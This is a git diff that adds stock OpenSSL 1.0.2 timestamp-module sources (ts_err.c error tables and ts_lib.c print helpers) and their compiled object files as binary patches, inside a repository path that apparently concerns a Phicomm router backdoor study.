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
WXa43uTR!=!3QOp2CX0_w`Tqjf{&hnD

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_err.c
new file mode 100644
index 0000000..ff1abf4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_err.c
@@ -0,0 +1,188 @@
+/* crypto/ts/ts_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/ts.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_TS,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_TS,0,reason)
+
+static ERR_STRING_DATA TS_str_functs[] = {
+    {ERR_FUNC(TS_F_D2I_TS_RESP), "d2i_TS_RESP"},
+    {ERR_FUNC(TS_F_DEF_SERIAL_CB), "DEF_SERIAL_CB"},
+    {ERR_FUNC(TS_F_DEF_TIME_CB), "DEF_TIME_CB"},
+    {ERR_FUNC(TS_F_ESS_ADD_SIGNING_CERT), "ESS_ADD_SIGNING_CERT"},
+    {ERR_FUNC(TS_F_ESS_CERT_ID_NEW_INIT), "ESS_CERT_ID_NEW_INIT"},
+    {ERR_FUNC(TS_F_ESS_SIGNING_CERT_NEW_INIT), "ESS_SIGNING_CERT_NEW_INIT"},
+    {ERR_FUNC(TS_F_INT_TS_RESP_VERIFY_TOKEN), "INT_TS_RESP_VERIFY_TOKEN"},
+    {ERR_FUNC(TS_F_PKCS7_TO_TS_TST_INFO), "PKCS7_to_TS_TST_INFO"},
+    {ERR_FUNC(TS_F_TS_ACCURACY_SET_MICROS), "TS_ACCURACY_set_micros"},
+    {ERR_FUNC(TS_F_TS_ACCURACY_SET_MILLIS), "TS_ACCURACY_set_millis"},
+    {ERR_FUNC(TS_F_TS_ACCURACY_SET_SECONDS), "TS_ACCURACY_set_seconds"},
+    {ERR_FUNC(TS_F_TS_CHECK_IMPRINTS), "TS_CHECK_IMPRINTS"},
+    {ERR_FUNC(TS_F_TS_CHECK_NONCES), "TS_CHECK_NONCES"},
+    {ERR_FUNC(TS_F_TS_CHECK_POLICY), "TS_CHECK_POLICY"},
+    {ERR_FUNC(TS_F_TS_CHECK_SIGNING_CERTS), "TS_CHECK_SIGNING_CERTS"},
+    {ERR_FUNC(TS_F_TS_CHECK_STATUS_INFO), "TS_CHECK_STATUS_INFO"},
+    {ERR_FUNC(TS_F_TS_COMPUTE_IMPRINT), "TS_COMPUTE_IMPRINT"},
+    {ERR_FUNC(TS_F_TS_CONF_SET_DEFAULT_ENGINE), "TS_CONF_set_default_engine"},
+    {ERR_FUNC(TS_F_TS_GET_STATUS_TEXT), "TS_GET_STATUS_TEXT"},
+    {ERR_FUNC(TS_F_TS_MSG_IMPRINT_SET_ALGO), "TS_MSG_IMPRINT_set_algo"},
+    {ERR_FUNC(TS_F_TS_REQ_SET_MSG_IMPRINT), "TS_REQ_set_msg_imprint"},
+    {ERR_FUNC(TS_F_TS_REQ_SET_NONCE), "TS_REQ_set_nonce"},
+    {ERR_FUNC(TS_F_TS_REQ_SET_POLICY_ID), "TS_REQ_set_policy_id"},
+    {ERR_FUNC(TS_F_TS_RESP_CREATE_RESPONSE), "TS_RESP_create_response"},
+    {ERR_FUNC(TS_F_TS_RESP_CREATE_TST_INFO), "TS_RESP_CREATE_TST_INFO"},
+    {ERR_FUNC(TS_F_TS_RESP_CTX_ADD_FAILURE_INFO),
+     "TS_RESP_CTX_add_failure_info"},
+    {ERR_FUNC(TS_F_TS_RESP_CTX_ADD_MD), "TS_RESP_CTX_add_md"},
+    {ERR_FUNC(TS_F_TS_RESP_CTX_ADD_POLICY), "TS_RESP_CTX_add_policy"},
+    {ERR_FUNC(TS_F_TS_RESP_CTX_NEW), "TS_RESP_CTX_new"},
+    {ERR_FUNC(TS_F_TS_RESP_CTX_SET_ACCURACY), "TS_RESP_CTX_set_accuracy"},
+    {ERR_FUNC(TS_F_TS_RESP_CTX_SET_CERTS), "TS_RESP_CTX_set_certs"},
+    {ERR_FUNC(TS_F_TS_RESP_CTX_SET_DEF_POLICY), "TS_RESP_CTX_set_def_policy"},
+    {ERR_FUNC(TS_F_TS_RESP_CTX_SET_SIGNER_CERT),
+     "TS_RESP_CTX_set_signer_cert"},
+    {ERR_FUNC(TS_F_TS_RESP_CTX_SET_STATUS_INFO),
+     "TS_RESP_CTX_set_status_info"},
+    {ERR_FUNC(TS_F_TS_RESP_GET_POLICY), "TS_RESP_GET_POLICY"},
+    {ERR_FUNC(TS_F_TS_RESP_SET_GENTIME_WITH_PRECISION),
+     "TS_RESP_SET_GENTIME_WITH_PRECISION"},
+    {ERR_FUNC(TS_F_TS_RESP_SET_STATUS_INFO), "TS_RESP_set_status_info"},
+    {ERR_FUNC(TS_F_TS_RESP_SET_TST_INFO), "TS_RESP_set_tst_info"},
+    {ERR_FUNC(TS_F_TS_RESP_SIGN), "TS_RESP_SIGN"},
+    {ERR_FUNC(TS_F_TS_RESP_VERIFY_SIGNATURE), "TS_RESP_verify_signature"},
+    {ERR_FUNC(TS_F_TS_RESP_VERIFY_TOKEN), "TS_RESP_verify_token"},
+    {ERR_FUNC(TS_F_TS_TST_INFO_SET_ACCURACY), "TS_TST_INFO_set_accuracy"},
+    {ERR_FUNC(TS_F_TS_TST_INFO_SET_MSG_IMPRINT),
+     "TS_TST_INFO_set_msg_imprint"},
+    {ERR_FUNC(TS_F_TS_TST_INFO_SET_NONCE), "TS_TST_INFO_set_nonce"},
+    {ERR_FUNC(TS_F_TS_TST_INFO_SET_POLICY_ID), "TS_TST_INFO_set_policy_id"},
+    {ERR_FUNC(TS_F_TS_TST_INFO_SET_SERIAL), "TS_TST_INFO_set_serial"},
+    {ERR_FUNC(TS_F_TS_TST_INFO_SET_TIME), "TS_TST_INFO_set_time"},
+    {ERR_FUNC(TS_F_TS_TST_INFO_SET_TSA), "TS_TST_INFO_set_tsa"},
+    {ERR_FUNC(TS_F_TS_VERIFY), "TS_VERIFY"},
+    {ERR_FUNC(TS_F_TS_VERIFY_CERT), "TS_VERIFY_CERT"},
+    {ERR_FUNC(TS_F_TS_VERIFY_CTX_NEW), "TS_VERIFY_CTX_new"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA TS_str_reasons[] = {
+    {ERR_REASON(TS_R_BAD_PKCS7_TYPE), "bad pkcs7 type"},
+    {ERR_REASON(TS_R_BAD_TYPE), "bad type"},
+    {ERR_REASON(TS_R_CERTIFICATE_VERIFY_ERROR), "certificate verify error"},
+    {ERR_REASON(TS_R_COULD_NOT_SET_ENGINE), "could not set engine"},
+    {ERR_REASON(TS_R_COULD_NOT_SET_TIME), "could not set time"},
+    {ERR_REASON(TS_R_D2I_TS_RESP_INT_FAILED), "d2i ts resp int failed"},
+    {ERR_REASON(TS_R_DETACHED_CONTENT), "detached content"},
+    {ERR_REASON(TS_R_ESS_ADD_SIGNING_CERT_ERROR),
+     "ess add signing cert error"},
+    {ERR_REASON(TS_R_ESS_SIGNING_CERTIFICATE_ERROR),
+     "ess signing certificate error"},
+    {ERR_REASON(TS_R_INVALID_NULL_POINTER), "invalid null pointer"},
+    {ERR_REASON(TS_R_INVALID_SIGNER_CERTIFICATE_PURPOSE),
+     "invalid signer certificate purpose"},
+    {ERR_REASON(TS_R_MESSAGE_IMPRINT_MISMATCH), "message imprint mismatch"},
+    {ERR_REASON(TS_R_NONCE_MISMATCH), "nonce mismatch"},
+    {ERR_REASON(TS_R_NONCE_NOT_RETURNED), "nonce not returned"},
+    {ERR_REASON(TS_R_NO_CONTENT), "no content"},
+    {ERR_REASON(TS_R_NO_TIME_STAMP_TOKEN), "no time stamp token"},
+    {ERR_REASON(TS_R_PKCS7_ADD_SIGNATURE_ERROR), "pkcs7 add signature error"},
+    {ERR_REASON(TS_R_PKCS7_ADD_SIGNED_ATTR_ERROR),
+     "pkcs7 add signed attr error"},
+    {ERR_REASON(TS_R_PKCS7_TO_TS_TST_INFO_FAILED),
+     "pkcs7 to ts tst info failed"},
+    {ERR_REASON(TS_R_POLICY_MISMATCH), "policy mismatch"},
+    {ERR_REASON(TS_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE),
+     "private key does not match certificate"},
+    {ERR_REASON(TS_R_RESPONSE_SETUP_ERROR), "response setup error"},
+    {ERR_REASON(TS_R_SIGNATURE_FAILURE), "signature failure"},
+    {ERR_REASON(TS_R_THERE_MUST_BE_ONE_SIGNER), "there must be one signer"},
+    {ERR_REASON(TS_R_TIME_SYSCALL_ERROR), "time syscall error"},
+    {ERR_REASON(TS_R_TOKEN_NOT_PRESENT), "token not present"},
+    {ERR_REASON(TS_R_TOKEN_PRESENT), "token present"},
+    {ERR_REASON(TS_R_TSA_NAME_MISMATCH), "tsa name mismatch"},
+    {ERR_REASON(TS_R_TSA_UNTRUSTED), "tsa untrusted"},
+    {ERR_REASON(TS_R_TST_INFO_SETUP_ERROR), "tst info setup error"},
+    {ERR_REASON(TS_R_TS_DATASIGN), "ts datasign"},
+    {ERR_REASON(TS_R_UNACCEPTABLE_POLICY), "unacceptable policy"},
+    {ERR_REASON(TS_R_UNSUPPORTED_MD_ALGORITHM), "unsupported md algorithm"},
+    {ERR_REASON(TS_R_UNSUPPORTED_VERSION), "unsupported version"},
+    {ERR_REASON(TS_R_WRONG_CONTENT_TYPE), "wrong content type"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_TS_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(TS_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, TS_str_functs);
+        ERR_load_strings(0, TS_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..5991a467592e4c6ec6bdde7235fe1e742d13f1ad
GIT binary patch
literal 1360
zcmbtT%}T>S5T2O&U$BY?p;GEeMZ2W_AbOC3)LulSDtM8Qwy_o4v?N<l5Bdsy6dytG
z1$+#TiZ?Gh)9j|(wIb-iW@f&fZ+><+_xXeUA;SPE2JAx5lPJK^P|wbF%^bvG65gj$
zA5T!&+uKPmotD}jZ>P7}I<qp_t#;SV-mO{8+E@-@h#@zDYZzDI@DwoZBVi^klG#v!
zaa#oAI$<Q^qhlRxi12x_N8I0pW{APt=b$)q;DpqJGNeK@qwW+CO|v^iKSrJjBj3R;
zKKcVrC(thw=*}p8Ml<ukc730fAzv)o^`=v?Pmb+?`<GrdKu%hup-K9tVZlv<J0)Nk
z8|s?0xO>fkRUGaBD+K|ta<kEJJ;b~wcNtz&Cg4u_O88Z;&02o5<@)>vnD5pd=GN>B
z-)Xp__&-z<xpa5>3Fbu3=p2Mkv8pVfLzsL|axX6pP3!zc+#kdBSN<w;DW`=?6<L2p
z1<{uErQTF9HMFHViY<8(qB``-`tBZm$xoxL3eBp@IXaY6=XXSqK9|lv!#H})IT0__
zvuJcq0OP2sPsx|~pxQ)vqz}q#sDS<t%AxZK)9;Qb52AjG97O~iA=79L;=hQ%Y7`k7
GI{ypFNlz32

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_lib.c
new file mode 100644
index 0000000..c51538a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_lib.c
@@ -0,0 +1,143 @@
+/* crypto/ts/ts_lib.c */
+/*
+ * Written by Zoltan Glozik (zglozik@stones.com) for the OpenSSL project
+ * 2002.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/bn.h>
+#include <openssl/x509v3.h>
+#include "ts.h"
+
+/* Local function declarations. */
+
+/* Function definitions. */
+
+int TS_ASN1_INTEGER_print_bio(BIO *bio, const ASN1_INTEGER *num)
+{
+    BIGNUM num_bn;
+    int result = 0;
+    char *hex;
+
+    BN_init(&num_bn);
+    ASN1_INTEGER_to_BN(num, &num_bn);
+    if ((hex = BN_bn2hex(&num_bn))) {
+        result = BIO_write(bio, "0x", 2) > 0;
+        result = result && BIO_write(bio, hex, strlen(hex)) > 0;
+        OPENSSL_free(hex);
+    }
+    BN_free(&num_bn);
+
+    return result;
+}
+
+int TS_OBJ_print_bio(BIO *bio, const ASN1_OBJECT *obj)
+{
+    char obj_txt[128];
+
+    int len = OBJ_obj2txt(obj_txt, sizeof(obj_txt), obj, 0);
+    BIO_write(bio, obj_txt, len);
+    BIO_write(bio, "\n", 1);
+
+    return 1;
+}
+
+int TS_ext_print_bio(BIO *bio, const STACK_OF(X509_EXTENSION) *extensions)
+{
+    int i, critical, n;
+    X509_EXTENSION *ex;
+    ASN1_OBJECT *obj;
+
+    BIO_printf(bio, "Extensions:\n");
+    n = X509v3_get_ext_count(extensions);
+    for (i = 0; i < n; i++) {
+        ex = X509v3_get_ext(extensions, i);
+        obj = X509_EXTENSION_get_object(ex);
+        i2a_ASN1_OBJECT(bio, obj);
+        critical = X509_EXTENSION_get_critical(ex);
+        BIO_printf(bio, ": %s\n", critical ? "critical" : "");
+        if (!X509V3_EXT_print(bio, ex, 0, 4)) {
+            BIO_printf(bio, "%4s", "");
+            M_ASN1_OCTET_STRING_print(bio, ex->value);
+        }
+        BIO_write(bio, "\n", 1);
+    }
+
+    return 1;
+}
+
+int TS_X509_ALGOR_print_bio(BIO *bio, const X509_ALGOR *alg)
+{
+    int i = OBJ_obj2nid(alg->algorithm);
+    return BIO_printf(bio, "Hash Algorithm: %s\n",
+                      (i == NID_undef) ? "UNKNOWN" : OBJ_nid2ln(i));
+}
+
+int TS_MSG_IMPRINT_print_bio(BIO *bio, TS_MSG_IMPRINT *a)
+{
+    const ASN1_OCTET_STRING *msg;
+
+    TS_X509_ALGOR_print_bio(bio, TS_MSG_IMPRINT_get_algo(a));
+
+    BIO_printf(bio, "Message data:\n");
+    msg = TS_MSG_IMPRINT_get_msg(a);
+    BIO_dump_indent(bio, (const char *)M_ASN1_STRING_data(msg),
+                    M_ASN1_STRING_length(msg), 4);
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..a77dbafd4237ce23979e2d844326485921ddbcf1
GIT binary patch
literal 5008
zcmbuCTWlM}8pkJbLPJS625~XB%0S97ml`{1>4l53jvcSTwM*l)<x&>Mb`wKlhj;@4
z#5HZ`Dh(8g2QGs1a&*qokq+>JfIc7tg@S~T$_r1Z4?qD46)2aAo5J^>ok=EZuY|-W
z?OcBIec#MCGdr{Ua3Vd>+S0<Lw6N>hQcY6E{QjkKA20SXjjduobglkX-=2v6tPiE^
zpY&YH{(Z=p`6g5}=GxYTNYSw4-GOM`u)i?uZ@+@2VINN~76sZ{w^9dN(Kx>zI%)gM
zl>IJO-&=p^QnH`<V1caC_VE)hQ6qI|oIGO8-?Sif^saxt*Wh)Ix-J^M&Ooeor}vpd
zp}76sF8wxrmwx*@eEhlS2Znv(%}1!?A;bQ|c=VfRsHlXnr+XiPXgxh&?CzlMxu>*!
zj6$;C=9Pn(G%@(aK<6C0h9Nw92>xG(35~-U!wz`AjtJAY^SKnx^jsqP`Ou(Y|3=dq
z5FI<SMl;(PzoyvT*){(h*~RT+m?38ZxuRhoHpDC%_EE!rPf*7^ZJ$^i@X@{XR9E7Y
zXq{_BKYpW)9MVFO87F(|Q>&Mh$<pyOH|3Wa%O~KdzHo@Ee0}S}!h$h#D8Qq=RZP2X
z@}T)-&t32Mnm-G{(?(cnA9jfSHqE5yHCo^GHQJr^O4&bhTl?fzq5AD&bWZ$aDT0y9
zMTAE+=QrjiI=I;_i%SrhW-D1?vTT(L`7y>4(^jccD_1ME%`4gF;F{V>wq{+84P|c3
zWOrnkk*|#g^|6sE8H|oQ?ORH<T7IMyEat5|8L?!4|K?z5Xn3k(O$9fFd&7~n(G63)
z8hxlI5{|69%)y9?G0Zn!v37crnIT5+LLJOU59CZIV=eb@V=dGEmh(GTbR3`!w2t@%
zqOFd6K=VJ*n$QCCzJwOs-xk+Gv+Z$hYwHVID6R!#S|FzRV_HXuRCCZL*@J}a_P5@s
z1!jFWXs@)i-k}AEkRmn3>3M`6$WKV9<w@v1;fra(`L?tc+E0B%W>3+zjWa8f)Z0OA
z<A4^?wGb&R_8B14_hC=60ZBsh&$f>9KDw#;IT*<fBz!z^j3=oDA5=zz#zw)r)W*JF
zXl%h8qP0<ci?h4D&Bs?`IYZ6ISEm_Y(FnOdX0K6v?9>KGJB9?Szg)U_wY_1a&VFcb
zusB!fJ9bOHRtv5zAzr#faJh$MGxi6@bFl;>U(54$cBzZ^2p)EEzRu()=HjUO*eMP4
zS|VpC>s1#T+bLJBAVC?Um$fOkJow`t{3#Fqya)e}2Y=av*NG!8<d8j1#*R?lEUr(9
zLq9IIE`RTc9rw`x#e-{P-^~Ao9(;obPkQiz2e&-<EOErO370*Ivp*Pn(L?`#9{g3|
zXF~YlX9oHE$V2~_2mix^GplBfm50Lx7Ebp^kVKL6AX$f`7s+}gS0mYgWFwMIEH`NC
zgPEwA%H$Hs#5QwcvRtvu;c}Ik$#gcRr_JoZz+fV0=JZ%PVX|1pELX}FTV`Zc%~%Fa
z!<C-V(lm>uvgW;X-;`MYwwt%+vgYo|QVH!mH_e)rFWhAoM(;9r=gVUlLpFAU(lu(;
z;X8Y*X$y^|X-jE@b3V%5Z0GvOrh9tLk&?xA3RSwmT##4I#LiqIGnmR|xGuRa6)aZn
z$vd%AcZvR7GtI?Y7Cmk6g&(JHC;q|Qwp1o52n`fkrk+k_)p?Y`RLVt$GUYvE6~wh=
zFlnZ?Y$YGUE1!2)1A@!b_3btQAFqw@xh_tPPtdXyOB6oIRY*wM=sBC7-|4dkvKf#B
z{2Y2Dm**Wg?mfu|sSLrk#VsKD?SLfE#~Cj9V}K-Xe!#(;pGRe>j}J=-^v|b9^8W*p
